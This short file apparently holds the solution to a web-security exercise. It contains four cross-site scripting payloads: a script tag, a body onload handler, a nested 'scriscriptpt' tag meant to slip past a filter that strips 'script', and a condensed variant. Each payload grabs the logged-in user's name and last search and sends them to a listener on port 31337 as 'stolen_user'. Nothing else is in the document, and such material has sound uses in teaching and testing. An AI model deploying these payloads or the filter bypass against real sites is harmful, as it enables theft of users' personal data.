<script>
	function test(){
		var name = $('#logged-in-user').text();
		var last_search = $('a.history-item.list-group-item:eq(1)').text();
		var url = 'http://localhost:31337/?stolen_user=' + name + '&last_search=' + last_search;
		$.get(url);
	}
	window.onload = test;
</script>

<body onload = "(function(){
		var name = $('#logged-in-user').text();
		var last_search = $('a.history-item.list-group-item:eq(1)').text();
		var url = 'http://localhost:31337/?stolen_user=' + name + '&last_search=' + last_search;
		$.get(url);
	}).call()"></body>

<scriscriptpt>
	function test(){
		var name = $('#logged-in-user').text();
		var last_search = $('a.history-item.list-group-item:eq(1)').text();
		var url = 'http://localhost:31337/?stolen_user=' + name + '&last_search=' + last_search;
		$.get(url);
	}
	window.onload = test;
</scriscriptpt>
<script>
	function test(){
		$.get(`http://localhost:31337/?stolen_user=` + $(`#logged-in-user`).text() + `&last_search=` + $(`a.history-item.list-group-item:eq(1)`).text())
	}
	window.onload = test
</script>
